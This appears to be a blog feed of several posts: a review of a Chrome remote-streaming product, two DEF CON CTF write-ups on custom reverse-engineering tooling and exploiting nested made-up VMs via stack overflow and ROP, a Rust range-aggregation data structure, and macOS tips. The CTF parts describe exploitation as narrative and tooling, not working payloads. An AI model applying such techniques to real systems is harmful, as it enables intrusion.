However, video compression systems use a much more general compression approach using motion vectors that gets at least some of the same bandwidth benefits, while being more robust. While my algorithm is great on normal scrolling, a fancy Apple product or startup website scrolljacking animation would cause lots of tiles not to be covered by the scrolling optimization and reduce it’s effectiveness. Video compression would keep working great as long as the motion was smooth. Like damage regions, it’s unfortunately tricky to integrate scrolling optimization with video compression, although again the approach of a separate lower latency side channel stream to preempt the video may work.

Remotey’s potential advantage, which they don’t use

Above I talked about how to optimize scrolling from the perspective of general display streaming, but Remotey’s specialization for Chrome gives them a potential huge advantage that they don’t currently use. Remotey could in theory integrate with the Chrome renderer to render contents outside the current browser viewport and preemptively send it to the client. This would allow small scrolls to be resolved instantly on the client without any networking or decoding, and the networking could catch up behind.

There’s a number of difficulties in this related to things like fixed position page elements, but interestingly solutions to all these problems are already implemented inside Chrome (and other browsers). Browsers already use a variation of this technique to avoid rendering latency on scrolling by rasterizing tiles of the page as layers, which the browser’s compositor then re-composites as you scroll without having to hit the renderer. In fact these are sometimes implemented as separate processes in the browser communicating over an IPC channel, basically like a higher-bandwidth lower latency network!

In principle Remotey could work by forwarding the browser at the layer level as opposed to the composited pixel level, and get minimal damage regions and scrolling optimization for free. The catch is that there’s some cases like YouTube videos and fancy animations that video compression would handle much better than remoting layers with static image compression would. This means if you don’t want to have unintuitive performance cliffs you need to combine some kind of difference-based video compression with the layer remoting, and that could get super complex, especially if you try to use video compression hardware. I see why they chose the approach they did, at least for now.

Gotchas on macOS

When undertaking any kind of unusual native app project, there’s a bunch of tiny gotchas you need to know about to avoid your app being slower or more power-hungry than it needs to be. Approximately nowhere tells you about avoiding these things, hence why I’m writing about them! Let’s look at some of the common macOS gotchas and whether Remotey gets them right:

Does it force use of the discrete GPU? Yes. This is the most common mistake for GPU rendered apps to make, and it causes dual-GPU systems like my 16” Macbook Pro to go from around 10W idle to 15W. Avoiding this requires some extra Metal API calls.
Does it constantly send 60fps compositor updates? No. A lot of apps make this mistake but Remotey doesn’t. If you mess it up it causes WindowServer to take an extra 10-20% CPU and extra power, not even attributable to the app without using Quartz Debug. The harder one to avoid is not having any animations that can get stuck going even with the window in the background, I’ve at least once had a Remotey tab stuck loading in the background, which caused updates to fire constantly.
Does it re-composite the entire window even for small changes? Yes. This is purely a power optimization, but it’s possible to tell the compositor when only a small part of your window changed, so it needs to do less work. A tiny loading spinner animation causes WindowServer to use an extra 10% of a core. The Core Animation APIs make it harder to avoid this on macOS than other platforms when using a custom renderer like Remotey, but Chrome uses a hack to manage it.
Does it use a transparent window for opaque content? No. Most macOS windows use a large opaque compositor layer with tiny transparent corners, but if you use the wrong API you can get one giant transparent layer, causing extra compositing work. Firefox had this problem for a long time, Remotey does not.
Does live resize go blank? Yes. Supporting smooth resizing can be tricky even for local GPU-rendered apps, Remotey has a much trickier distributed systems problem to solve, and it understandably goes blank when resizing.
Does it break when moving the window to a display with a different scale factor? Kinda yes. Remotey initially appears to handle this case smoothly, but when I did testing on my 4k display at 1x scaling I experienced huge 1-10s latency spikes when doing things like switching tabs and latency is generally higher. My guess is the remote Linux is still rendering at 2x scaling so has to deal with an enormous 8k resolution and has trouble or something.

Page loading

In my testing Remotey was only slightly faster at loading pages than my home 500Mbps connection:

https://www.apple.com/iphone-12/: ~3.4s Remotey vs ~ 3.8s Chrome
https://figma.com/: ~3.8s Remotey vs ~3.9s Chrome
https://thume.ca/2017/06/17/tree-diffing/: ~240ms Remotey vs ~240ms Chrome

These were just done casually averaging a few tries using the Chrome network inspector with caching disabled, I don’t claim they’re super scientific. Just that I didn’t notice a significant difference between my good home internet and their datacenter connection for page loading.

General experience

All of the above is interesting from a technical discussion standpoint, but in terms of Remotey as a product it focuses on measurable and interesting things rather than what’s important.

In general I’d say the overall smoothness of Remotey and its display streaming is quite good compared to other remote display technologies I’ve used. Although I haven’t used Parsec or Teradici, which would be the two I would guess based on technology might be comparable or better. The scrolling at high resolutions especially is quite smooth. There’s also no noticeable video compression artifacts, even on scrolling text, which is an issue I’ve noticed sometimes when video compression is added on to a legacy remote desktop system. Even watching YouTube videos works great.

Compared to my local Chrome though, Remotey isn’t for me. I have a fairly powerful laptop with 32GB of RAM, and don’t use any super heavy browser apps like Onshape, so Remotey is basically a straight downgrade. It drops frames when scrolling noticeably more often, interactions are noticeably just a bit laggier, it uses a bit more battery and integrates a little less smoothly (e.g no live resize). Those aren’t huge downsides though, it’s just that I don’t experience any compensating upsides. If I was someone who regularly found my browser very laggy, due to having a much weaker computer or heavier browser apps, I could imagine using Remotey.

Conclusion

Remotey is an interesting case study of how the new style of display streaming using hardware video compression can provide nicer experiences than older technologies while making it hard to implement further optimizations. Other systems like VNC, Citrix and Microsoft RDP which use custom CPU image patch compression make it really easy to implement all sorts of specialized tricks, but struggle on modern high resolutions, and fall off a cliff on hard cases like games and YouTube videos unless they adaptively switch to video compression.

I expect that higher bandwidth connections, new streaming technologies, and trends like increased working from home and potentially VR meeting rooms/offices, will make display streaming a field that remains interesting over the next few years. I find this area pretty interesting and hope to follow progress and maybe do some more tinkering. I would pitch myself as a consultant with this post as a work sample, but I have a full time job and my US visa status means I can’t earn income any other way, so instead you can feel free to email me and maybe I’ll be interested enough to chat about it.

Drafts of this post mentioned who the startup was, but they reasonably asked that I not leave outdated measurements and statements about their constantly improving product tied to their name. Even if you guess who the startup is, they’ve likely substantially improved performance and implemented fixes since I did these measurements in September 2021. Ideally don’t speculate using their real name in comments. ↩

Making reverse engineering tools for DEF CON Quals

2021-05-09T00:00:00+00:00

Last weekend I played with Samurai in the DEF CON CTF Quals where I worked on a crazy problem which involved exploiting a program binary for a made-up architecture, which was running on a VM written for a weird made-up parallel machine architecture, running on another VM for that parallel machine which we only had outdated incorrect source code for.

Because of this crazy nested weird VM setup, most of me and my teammates’ time was spent building some really cool tooling for these two architectures so that we could figure out the program, understand, the vulnerability and test our exploit.

Full write-up from my teammate

My teammate Zack did an excellent write-up of the problem and our tools, go read it. He shows off the Binary Ninja disassembly plugin he wrote to make it easy to reverse-engineer the inner binary in an excellent UI. He also gives an overview of the work me and my other teammates did. It was really fun working with Zack, Sam, Emma, Brock and occasional others in Discord late into the night at various levels of exhaustion, often sharing screens and pair programming.

Reversing the Manchester VM binary

I first worked to help reverse-engineer the changes to the Manchester parallel machine interpreter that they had made since the previous year’s challenge using a similar machine that they had released code for. It made for some really fun reversing to have source code to reference but things had changed since and we needed to figure out what the changes did using only the binary.

A cool feature that decompilers like Binary Ninja’s have is that you can give them type annotations and names that you figure out and it will use them to improve the decompilation. Whenever we figured something out, possibly annotated by a teammate using our comment syncing system, I’d update my type definitions to get a better decompilation. Here’s an example of some decompilation upon first opening the binary:

And after creating an enum type with all the VM instruction codes we figured out, and annotating the result structure type and parameter names:

Once we figured out the new opcode mappings and features of the VM my teammate Sam made the same changes to the old source code we had and verified that it could run the new Manchester programs we had. This helped check we got it right and also proved really useful for a later tool.

Fooling around with the Binary Ninja Debugger

I spent some time afterwards fooling around with getting the Binary Ninja debugger plugin to connect to the VM binary running in my Docker container and allow me to step through it over the GDB server protocol. This didn’t actually end up being that helpful, but I wanted to learn how to do it anyways because I find the idea of being able to debug a binary in a full reversing suite really cool. It took a lot of code reading since the way to do this using the plugin wasn’t documented.

Memory trace reconstruction tool

Armed with Zack’s Binary Ninja plugin for the inner VM, we were ready to work on exploiting the inner program, but we were having trouble understanding what was going on. It was hard to get information about what happened in the inner VM and running experiments took a long time since the nested weird VMs meant startup took minutes each time.

I set to work on a tool to gain more visibility into the system, and since I think about tracing tools a lot, I made a little tracing system. We had found some memory allocations that we figured stored state of the inner VM, so I modified Sam’s updated source to log every read and write to those memory regions so we could figure out what was going on.

It was surprisingly easy. I stored some info on each event in a uint64_t[4] array with the first field being an event ID and the following fields storing various useful info for each event. Then I cast it to a void* and wrote it to a file with fwrite, which is buffered so I didn’t have to worry about overhead from tons of write syscalls. It turns out there weren’t that many writes though so we later added a flush after each event so we could get streaming updates as the computation progressed.

Armed with this binary file in a very simple format, I opened in a hex editor, dragged the window until it was 4*8 bytes wide so it was kind of like an event log, and scrolled through it. I managed to identify which allocated region was the memory of the inner VM and which was the registers, and what offset all the registers were at.

So I wrote a little Python script which could read the trace and print out all the register values each time the program counter register changed, effectively giving us a window into the execution of the machine. Next I reconstructed all the VM memory contents from write events in the trace, which allowed dumping the memory contents at any instruction based on arbitrary conditions, or at the end of the execution.

This ended up synergizing really well with Zack’s plugin when developing our exploit. We could load the final memory state (which contained the program code as well) in Binary Ninja and it would disassemble everything, and we could even disassemble the shellcode we overflowed onto the stack and see how it had been corrupted by later writes. Then we could go back through the execution trace file and figure out where our exploit had gone wrong.

Zack even loaded the Binary Ninja API in the trace replay tool to add disassembly and symbol names of each executed instruction into the printed trace:

C1_epilogue_and_store+bc       02000200 PUSH    r2
   [pc=0x3c8 sp=0xf30 r1=0xaaa r2=0xef8 r4=0x67616c66 r8=0x2088000010101 flags=0x4]
log_name_read_len+2a9          01021800 MOV    r2, 0x18
   [pc=0xef8 sp=0xf30 r1=0xaaa r2=0xef8 r4=0x67616c66 r8=0x2088000010101 flags=0x4]
log_name_read_len+2ad          04022000 ADD    r2, pc
   [pc=0xefc sp=0xf30 r1=0xaaa r2=0x18 r4=0x67616c66 r8=0x2088000010101 flags=0x4]
log_name_read_len+2b1          01040400 MOV    r4, 0x4
   [pc=0xf00 sp=0xf30 r1=0xaaa r2=0xf18 r4=0x67616c66 r8=0x2088000010101 flags=0x4]
log_name_read_len+2b5          80010100 SVC    0x1, 0x1
   [pc=0xf04 sp=0xf30 r1=0xaaa r2=0xf18 r4=0x4 r8=0x2088000010101 flags=0x4]

Concluding Thoughts

Even though I didn’t work on as many different problems as I usually do for DC Quals (partially due to having my vaccine appointment and getting bowled over by immune reaction half way through), I had fun making a bunch of completely overkill tooling for a really hard problem.

Debugging using the execution trace was a really cool experience that made me yearn for more of that kind of omniscient debugging like Pernosco in my normal programming work. It was great being able to do things like “oh no when did that memory get the bad value” and just using text editor search functionality to find the last MOV to that address “backwards in time”. The “text file of every executed instruction” doesn’t scale to larger programs, but programs like rr and Pernosco do, and I want to use them more.

Implicit In-order Forests: Zooming a billion trace events at 60fps

2021-03-14T00:00:00+00:00

In the course of trying to figure out how to smoothly zoom timelines of a billion trace events, I figured out a cool tree structure that I can’t find elsewhere online, which it turned out two of my friends have independently derived after not finding anything on their own searches. It’s a way of implementing an index for doing range aggregations on an array (e.g “find the sum/max of elements [7,12]”) in O(log N) time, with amortized constant time appends, a simple implementation (around 50 lines of Rust), low constant factors, and low memory overhead.

The structure is a variation on the idea of an implicit binary tree, usually used for heaps, which let you represent a complete binary tree compactly in an array, with structure determined by layout of the array rather than pointers. Instead of arranging nodes breadth-first like usual, the structure I use has an in-order depth-first arrangement, and it uses a forest of power-of-two sized complete trees instead of one nearly-complete tree. These changes make the implementation of appends much simpler, improve cache efficiency, lower memory overhead, and if combined with a virtual-memory-based growable array provide O(log N) tail latency on appends instead of O(N).

I used my implementation to make a prototype trace timeline that can smoothly zoom 1 billion events, which I don’t think any existing trace viewer can do while preserving similar detail, but the underlying structure can aggregate any associative operation (monoid). While my high-level competitve programmer friends didn’t recognize the layout, my friend Raph Levien remembered figuring out a similar thing for Android’s SpannableStringBuilder, and my colleague Stephen Dolan said he went on a similar journey of discovery while coming up with vectorization-friendly k-d trees.

The `IForestIndex` data structure

The general idea behind data structures to accelerate range queries is that pre-aggregating elements into chunks of varying sizes can save work at query-time. When we get the range we want to query, we pick the set of chunks that together make up the range and aggregate them together, as opposed to aggregating all the individual elements in the range. A binary segment tree structure where the lowest level aggregates two elements, the next aggregates four elements and so on leads to a guarantee that any range can be covered with O(log N) chunks.

What I’ll describe is a specific way to lay out such an aggregation structure in an array, take a glance and I’ll explain the diagram’s details below:

The in-order layout is a way to store an aggregation tree in an array where every even indexed element is a leaf and every odd indexed element aggregates to its left and right using some associative operation (the diagram uses sum). The aggregating nodes form a binary tree structure such that the first level aggregates two leaf nodes, the second level aggregates two level one aggregation nodes, etc…

When our number of items isn’t a power of two, some of the aggregation nodes at higher levels won’t be able to aggregate as far to the right as they’re supposed to, because there isn’t a node there yet, so they’ll be incomplete (shown in grey in the diagram). This means it isn’t technically a tree structure, but a forest of power-of-two sized trees, making up the correct number of total items. When we append a new item, we first append the leaf node, then complete any incomplete trees that should include that node, and then add a new incomplete aggregation node of the right height after it.

How do we decide which level a given node should aggregate and where the incomplete nodes it should complete are? It turns out that with this layout, the level of an aggregation node corresponds exactly to the number of trailing one bits in the binary representation of the index! This is great because modern processors have an efficient single instruction for “count trailing zeros”, and trailing ones just requires a bitwise not before that. It also turns out that the nodes we need to aggregate are powers of two away, and the number of aggregation nodes to complete corresponds to the level of the new aggregation node. This leads to a very simple implementation:

impl<A: Aggregate> IForestIndex<A> {
  // ...
  pub fn push(&mut self, block: &TraceBlock) {
      self.vals.push(A::from_block(block));

      let len = self.vals.len();
      // We want to index the first level every 2 nodes, 2nd level every 4 nodes...
      // This happens to correspond to the number of trailing ones in the index
      let levels_to_index = len.trailing_ones()-1;

      // Complete unfinished aggregation nodes which are now ready
      let mut cur = len-1; // The leaf we just pushed
      for level in 0..levels_to_index {
          let prev_higher_level = cur-(1 << level); // nodes at a level reach 2^level
          let combined = A::combine(&self.vals[prev_higher_level], &self.vals[cur]);
          self.vals[prev_higher_level] = combined;
          cur = prev_higher_level;
      }

      // Push new aggregation node going back one level further than we aggregated
      self.vals.push(self.vals[len-(1 << levels_to_index)].clone());
  }
  // ...
}

The range query is more straightforward in that it’s just starting on the left of the range and then skipping forward using the longest-reaching aggregation node it can without overshooting. I’ll let the code (and the example at the top of the diagram) speak for itself:

pub fn range_query(&self, r: Range<usize>) -> A {
    fn left_child_at(node: usize, level: usize) -> bool {
        // every even power of two block at each level is on the left
        (node>>level)&1 == 0
    }
    fn skip(level: usize) -> usize {
        // lvl 0 skips self and agg node next to it, steps up by powers of 2
        2<<level
    }
    fn agg_node(node: usize, level: usize) -> usize {
        node+(1<<level)-1 // lvl 0 is us+0, lvl 1 is us+1, steps by power of 2
    }

    let mut ri = (r.start*2)..(r.end*2); // translate underlying to interior indices
    let len = self.vals.len();
    assert!(ri.start <= len && ri.end <= len,
      "range {:?} not inside 0..{}", r, len/2);

    let mut combined = A::empty();
    while ri.start < ri.end {
        // Skip via the highest level where we're on the left and it isn't too far
        let mut up_level = 1;
        while left_child_at(ri.start, up_level) && ri.start+skip(up_level)<=ri.end {
            up_level += 1;
        }

        let level = up_level - 1;
        combined = A::combine(&combined, &self.vals[agg_node(ri.start, level)]);
        ri.start += skip(level);
    }
    combined
}

Edit: Michael Rojas wrote a Typescript implementation that includes more operations (like in-place update), as well as more bit tricks for improved efficiency. I updated the range query in my repo based on his work.

What’s good about this layout

The closest alternative to this layout is the breadth-first layout described everywhere else online, where you put the root node first, then all the nodes of the next level, and so on until at the end you have all the leaf nodes, with some spots at the end unfilled because you need to round the tree size up to the next power of two. Both of these layouts have nice mathematical relations that enable traversing the tree and mapping between leaf node indices and an array storing the data you’re indexing.

Edit: nightcracker on Reddit points out that it’s possible to formulate implicit Fenwick trees for arbitrary range queries with efficient append and a terse implementation. It looks like they have 3N size overhead instead of 2N, and I haven’t investigated enough to speak to other cache or efficiency properties.

Avoiding the memory and tail latency of amortized resizing

The main reason I ended up looking for an alternative to the breadth-first layout is that breadth-first append is annoying to implement. Because it’s a single incomplete tree rather than a forest of complete trees, whenever the size crosses a power of two you need to rearrange everything into a bigger tree structure with one more level. Not only do you need to write code to implement this case but the newly re-allocated tree has a 4x memory overhead over the space required for just the leaf nodes: 2x for being half empty and 2x for the usual cumulative count of all the aggregation nodes. Then if you don’t implement a fancy in-place re-organize, memory peaks at 6x since you need to have both the old and new tree around while you move things. Even if your amortized append cost is still O(1), the tail latency is terrible.

But wait, in my implementation of the in-order layout I use Rust’s growable Vec, and doesn’t that have the same 2x amortized resizing space waste and tail latency issues behind the scenes? Yes, kind of: In the basic case all I’m saving is implementation complexity, but there’s a way to improve the implementation to avoid this. Because 64 bit computers have address spaces way bigger than their physical memories, it’s possible to reserve an enormous address range for an array and then only allocate real pages at the end (which take up physical memory) as the array is filled. This avoids any slow resizing case and makes space waste only a small constant. If you want this to work on Windows, it requires a special implementation, but on Linux and macOS all you need to do is construct your Vec by using Vec::with_capacity with a huge size that’s more than you’ll need and smaller than physical memory, and VM overcommit will promise you the full address range and only use more physical memory as you push to the vector. I was thinking about how this data structure could be used for indexing enormous traces by using most of the memory on a machine, so the fact that this technique allows making the most of memory without much implementation effort was a big win.

You can apply the same technique for some savings on the breadth-first order, but because the aggregation nodes for the unusued space are not all at the end of the array you’d need to support missing pages in the middle of your array. You’d also still need to implement an in-place tree reorganize, so it would be much more complicated and you still wouldn’t get the tail latency benefits.

Better cache coherency

The depth-first layout has a nice property that near the leaves, entire subtrees are grouped together in memory, meaning subtrees may all be in the same cache line or page. This is especially nice given that range queries can traverse the tree from the bottom up and then down, avoiding touching unnecessary higher levels that are further away. In contrast for a tree in breadth-first order, the next level up will be in a separate range of memory from its leaves. On a huge tree where each parent node may end up on a separate page this may cause lots of TLB misses. This might’ve been bad for a case like my trace visualization, which requires thousands of queries per second on relatively small ranges in a huge structure.

The cache efficiency is likely still not as good as a B-tree or Van-Emde-Boas (VEB) layout, but those are much more complicated to implement. For VEB layouts, I could find research papers and benchmarks that describe the mathematical structure of the layout, but not how to efficiently implement operations like append. The usual breadth first order is also better at keeping all the higher levels of the tree together, so might perform better for repeated traversals from the root, I’m not sure.

Simpler and more memory-efficient than non-implicit structures

I’ve mainly compared against breadth-first implicit binary trees because they’re the closest competitor, but I started out looking at other structures. I knew about the general idea of segment trees and they’re often implemented as standard non-implicit tree structures. I first embarked on writing a B-tree structure but got frustrated with how much code it was taking and the different cases where non-leaf nodes contained pointers but leaves didn’t. I thought a lot about other data structures like skip lists and various optimizations of them but they were still too complex. The non-implicit data structures also tended to introduce a lot of memory overhead via their node pointers.

Other nice properties

In addition to appending, it’s possible to do some other operations like updating the values of nodes in place (Raph’s SpannableStringBuilder does this). If you’re building an entire tree at once instead of incrementally appending it’s possible to parallelize the construction of the index by divvying up subtrees among threads. I figured out but never used the fact that if you want to search a forest from the top down then checking the largest/first tree and working down has binary-search-like efficiency properties since the power-of-two structure means all the further trees together can be at most half the remaining items. Within each tree, my colleage Stephen pointed out that if you want to traverse the tree down to an index, then iterating the bits of the index in reverse tells you the direction to recurse at each level.

Backstory: Rendering huge traces

So how did I end up investigating this and what’s the connection to trace viewers? I was trying out Tracy, a system for doing performance optimization by capturing tracing events from instrumentation in your code and displaying it on a slick timeline UI, and I noticed that when I zoomed out enough all the detail was replaced with a squiggle that signified “some events here”. I’d used Perfetto and Catapult (other trace viewers, both by Google) before and they continued to show the texture of my trace events when zoomed out, but became very slow on large traces. I’ve never used RAD Telemetry but it looks like it’s somewhere in between, where unlike Tracy it still shows the number of levels but loses all other information when zoomed out.

Edit: Per Vognesen on Twitter says Telemetry does have a range aggregation data structure, which I’m guessing they use for aggregating time summary information panels (since their zoomed out rendering looks different than Perfetto). He links an interesting HN comment of his discussing a design using a hierarchy of B+ trees.

I checked Perfetto’s source code and found that it was quantizing the trace into small time slices and displaying color of the longest trace span under each time slice at each level. Combined with Perfetto’s approach of coloring trace spans based on a hash of the label, I thought this was a good way to give an overview of a zoomed out trace. It tended to show what the dominant event was at each level, how deep the nesting was at different points, and clicking showed what that specific event color was.

The problem is that Perfetto’s implementation used a slow linear scan and so when zoomed out on a large trace was very slow, and they relied on asynchrony to keep the UI responsive while the next zoom level was being computed. Since the “longest span in a time slice” corresponded to a range aggregation of “maximum duration” I thought it should be possible to use a tree structure to accelerate this and find the longest span under every pixel for every track of a large trace at 60fps, since that would only be on the order of 10k O(log N) queries per frame, and it could be parallelized across tracks.

I then embarked on my journey figuring out the IForestIndex data structure, and afterwards I used it to put together a simple proof-of-concept skeleton of a trace viewer that can smoothly zoom a trace of 1 billion randomly generated events. It’s not pretty since the randomly generated data has no structure, the colors are bad, it doesn’t render any span labels, and I don’t step backwards to render spans that start before the viewport starts, but it works:

Sorry, your browser doesn't support embedded videos.

I don’t actually plan on implementing my own full trace viewer, it’s a big task. I just wanted to have fun figuring out how to achieve the kind of trace zooming I wanted, and figure out a cool data structure in the process, since I suspected it was possible but didn’t know of anyone who’d done it. Given that I’m one of three people I know who’ve had to figure out this data structure themselves, hopefully this post will help any future people who want a data structure for this kind of problem.

Hard to discover tips and apps for making macOS pleasant

2020-09-04T00:00:00+00:00

Inspired by a few different conversations with friends who’ve switched to macOS where I give them a whole bunch of tips and recommendations I’ve learned about over many years which are super important to how I use my computer, but often quite hard to find out about, I decided to write them all down:

Hidden macOS tips

Dragging a file or folder onto a file open dialog selects it in the dialog. Similarly dragging onto a “Choose file” button.
Dragging onto a terminal window pastes the full path of that file/folder
You can drag the little file/folder icons at the top of many windows, useful in combo with previous tips.
If you hold down option while clicking the “Scaled” radio button in the Display preferences it’ll give you many more resolution options on external displays. If you want native resolution with no scaling on the built in display you’ll still need an external tool like SwitchResX, retina or QuickRes.
In Finder, return is the shortcut for rename, option+drag copies, and space is quicklook preview
In Preview if you open the Sidebar in a PDF you can drag pages around including between documents, hold option to copy, delete pages with backspace. This plus the edit toolbar solves 90% of my PDF munging needs.
You can select multiple images in Finder and drag them onto the Preview dock icon to open them in one window with a Sidebar where you can quickly flip between them with arrow keys.
In the Dock preferences there’s a “Prefer tabs when opening documents” setting which automatically groups your windows with window tabs. I find this especially useful for Sublime Text.
cmd+backtick is like cmd+tab but between windows of the same app. Adding shift (i.e., cmd+shift+backtick) reverses the order. You can add shift to cmd+tab to go backwards too.
Drag your most frequently used folders into the Finder sidebar for easy access including in file select dialogs.
Select multiple similarly named files in Finder, right-click, and choose “Rename Items..." for a reasonably powerful batch file renamer.
In the Finder preferences you can add your computer and drives to the sidebar.
cmd+shift+4 pops up a crosshair to take a screenshot of a region. Hit spacebar to switch to a mode that takes a screenshot of an entire window.
You can disable the popup for accented characters when you hold a key and increase key repeat rate beyond the normal maximum.
The open command lets you use the normal macOS file opening mechanism from the command line, I most frequently use open . to navigate to my current directory in my file browser.
Display “scales” other than 1x or 2x the physical resolution work by rendering at 2x the resolution then down-scaling. This causes apps to need to render a bunch of pixels that are mostly scaled away, consuming power and sometimes causing lag. It can also lead to weird aliasing issues in some contexts like shimmering of thin fonts when scrolling, as well as rendering in general not being pixel-perfect. I recommend trying to stick to either 1x or 2x scaling if you don’t lose much from it, then just adjusting your default web page scale and font sizes.
Text fields support a bunch of powerful movement and editing shortcuts based on Emacs.
option+2 types the ™ symbol, for use with sarcasm™. I probably use this more than the ^ symbol. You can open the keyboard viewer (you may have to enable “Show keyboard and emoji viewers in menu bar” in Keyboard Preferences) and hold down option to see all the other symbols you can type like this. The “Emoji & Symbols” pallete is also a great UI for finding handy Unicode characters, especially if you use the gear menu to add more symbol category pages.

Apps

A big part of why I prefer macOS is this list of macOS-only native apps which often don’t have adequate substitutes on Linux:

Dash: An amazing fast offline documentation search app. Cuts down a ton on the amount I Google for docs. It’s very quick to use especially when summoned with a keyboard shortcut and has tons of documentation sets.
Hammerspoon: My favorite app for getting the benefits of a Linux tiling window manager. I have home row shortcuts on my left hand bound to switch directly to my most frequently used apps, and my right hand to maximize windows, move them between screens and tile them to the left and right halves of the screen. Here’s my config.
Screenie: I only use this for the feature where dragging from the menu bar icon lets you put your most recent screenshot in say messaging apps. It also offers search and things. CleanShot X and Zappy also look like good screenshot apps but I haven’t tried them yet.
Karabiner Elements: A powerful keyboard remapping tool. I use it to bind right command to control and caps lock to ctrl+cmd+option+shift for use with Hammerspoon.
Alfred: A mildly better spotlight alternative, but for me the main benefit over spotlight is this workflow for indexing git repos.
Path Finder: A fancier version of Finder with multiple panes and various other advanced features. Other third party file managers you may want to try include Forklift, Commander One, Nimble Commander, Marta and fman. I use Path Finder because it’s the only one with a good columns view and that’s my favorite view for browsing.
Spark: A nice email app with categorized inbox functionality.
iStat Menus: All sorts of system monitoring in a menu bar. I really like the weather, and I also have a combined menu which shows my current power draw in watts and GPU selection in the icon.
Tweetbot: A native Twitter client that syncs with a similar IOS client. I really like how it just keeps your position in an infinite scroll where new tweets get added to the top, so I can easily read every new tweet from people I follow without seeing any likes, algorithmic suggestions or ads.
Hex Fiend: A really good hex editor/viewer. I like their “Templates” feature where you can describe a binary format with a script and it will overlay the parse tree on the hex view.
iTerm2: An alternative Terminal with just so many features. I particularly like the ability to split windows into panes, which Apple’s Terminal does not have.
nvAlt: A note taking app that I like, although it’s kinda bare-bones and has some bugs. It’s currently unmaintained because the author is working on nvUltra which isn’t released yet.
ImageOptim: Easy app where you drag image files onto it and it reduces their size.
VMWare Fusion: Great for running Linux and Windows VMs. The reason I chose it over Parallels is that I knew it had virtualized PMC support, which enables using rr in VMs. But apparently Parallels also has this in the Pro version, and it might be nicer in other ways, not sure which is better.
Calca: A weird live math calculator notebook thing with units. The editing can be kind of glitchy but the basic functionality is really cool. Soulver is a similar but more expensive app with a nicer UI but less powerful underlying calculator language.
Quartz Debug: There are some apps that reduce your battery life in an insidious way where it doesn’t show as CPU usage for their process but as increased WindowServer CPU usage. If your WindowServer process CPU usage is above maybe 6-10% when you’re not doing anything, some app in the background is probably spamming 60fps animation updates. As far as I know you can only figure out which app is at fault by getting the Quartz Debug app from Apple’s additional developer tools, enabling flash screen updates (and no delay after flash), then going to the overview mode (four finger swipe up) and looking for flashing. This same problem can also occur on Linux and Windows but I don’t know how much power it saps there.
Sublime Text and Merge: These aren’t exactly macOS-only apps but they’re some of my favorite apps and they integrate excellently with macOS so I’m putting them here anyways.

Bonus: Browsers

Middle click opens links in a new tab and middle clicking on a tab closes it
There’s lots of lesser-known handy shortcuts: cmd/ctrl+l focuses the search filed, cmd/ctrl+w closes a tab
Vimium and OctoTree are my favorite browser extensions.
I believe YouTube in Chrome and Firefox default to VP8/9 video codecs which can’t be hardware-decoded so use lots of CPU and thus battery power especially at 2x speed or high resolutions. The h264ify family of extensions can force usage of GPU-supported h264 codecs. This can close some of the battery life gap with Safari.
If you use Safari, Chrome and Firefox have much better sounding audio resampling for watching videos on 1.5x or 2x speed. This is the only reason I don’t use Safari.

Bonus: IOS

IOS also has a bunch of hidden UI features, especially if you have a medium-old model of iPhone that still has force touch sensors.

Swiping left and right on the home bar at the bottom of the screen on phones since the iPhone X quickly switches between recent apps. This is absolutely essential to how I use my phone and such a huge boost to multitasking fluidity I feel bad for all the people who don’t know about it.
Force or long pressing on the keyboard (maybe just the spacebar on some phones), brings up a moveable cursor in text fields.
If you have force touch try it on everything, tons of widgets in the pull down settings have force touch features, notifications do, links do.
I’ve tried a lot of calculator apps and Kalkyl is my favorite for launch time and UI design for quick simple calculations. I also recommend Unread for RSS, and Apollo as possibly the best Reddit experience on any platform.
Is It Snappy lets you use an IOS device’s high speed camera to measure full-system interaction latency and find out that you have a slow keyboard, mouse or monitor. I have not found a similar app for Android.
Not exactly a software tip, but a non-obvious purchasing option: I contend buying an iPhone X on Ebay offers outstanding price/quality ratio even in 2020. It has basically the same screen/form factor/build quality as an iPhone 11 Pro, and I find it plenty fast and the camera sufficiently good, and those are basically the only things that improved. You even get force touch, which I really like as having lower latency than the more press-and-hold “3D Touch”. Meanwhile it’s less than half the price. I got mine discounted after the iPhone XS replaced it, and if mine broke I’d probably just buy another one now.

Bonus: The Chromium Catapult Trace Viewer

The motivation to write this post was caused by a conversation with a friend about macOS, which was in turn kicked off by a tweet about the The Chromium Trace Viewer (AKA Catapult). Catapult is super easy to get started with for visualizing trace data and I know lots of different people and projects who use it. Almost none of them know about this incredibly helpful first tip until I tell it to them, so they’re stuck with having to switch to the zoom tool in the toolbar:

Use alt+scroll to zoom. This really ought to be in noticeable text on their UI not buried in a shortcuts pane you have to press ? to see.
The search bar in the top left searches not only names but also arguments values, which you can use to search for IDs or add special tags like top100 for the 100 slowest events. Press f to zoom to a span once you’ve selected it with the search arrow buttons.
The JSON event format also supports “flow” arrows, which lets you draw arrows between your boxes to visualize dependencies.
Perfetto, Tracy and Speedscope can all visualize the same JSON format with different UIs and potentially without a trace size cap.

Reverse engineering an AI spaceship game at DEF CON CTF

2020-08-15T00:00:00+00:00

I recently played with Samurai in the DEF CON CTF 2020 finals, and want to write about an incredibly cool challenge I worked on called ropshipai. It involved reverse engineering a binary to discover the architecture and format of a neural network, creating a network to control your spaceship in an arena against all the other teams, then doing a ROP exploit using a buffer overflow to get more capacity for a smarter AI. I hope this article can give you a taste of what high level security CTF contests can be like and why they’re so fun.

Here’s what it looked like near the end of the contest, I cherry-picked a round where our final bot (labeled ‘X’ in light grey) won:

Sorry, your browser doesn't support embedded videos.

Part 1: Reverse engineering

We were given a download which included a PyGame UI to simulate the game. The UI called out to an x86 binary which we figured out computed the move for a team’s bot using an input file. We figured that file was probably the same thing the “Upload AI” button on the challenge’s web portal accepted. There was a challenge a previous year called “ropship” that involved a similar arena with bots controlled by return-oriented programming and we assumed the “AI” added this year meant a neural net, but didn’t yet see any of the organizers’ usual Tensorflow.

So we started reversing the binary, and my teammates found various functions that seemed to do floating point math and loops, which they started using IDA’s decompiler on and matching up with common neural net functions. They quickly found ReLU, then an iterative function that we figured out produced results matching e^x. We also found a function that at first appeared to be 1/(1-e^(-x)), which was confusing since that’s almost a sigmoid but with subtraction instead of addition. I took a look in Binary Ninja and it looked like addition to me, it turned out IDA had just decompiled it wrong and it was a sigmoid.

That left the big function with lots of math and loops, which we assumed was the main network evalutation function. I got to work using the new decompiled view in Binary Ninja to try and decipher what it was doing and what the structure of the inputs we had to give it were, while my teammate samczsun figured out the input file parsing code that set up those inputs. At the same time, other teammates figured out the simulator and what inputs it could feed to the network.

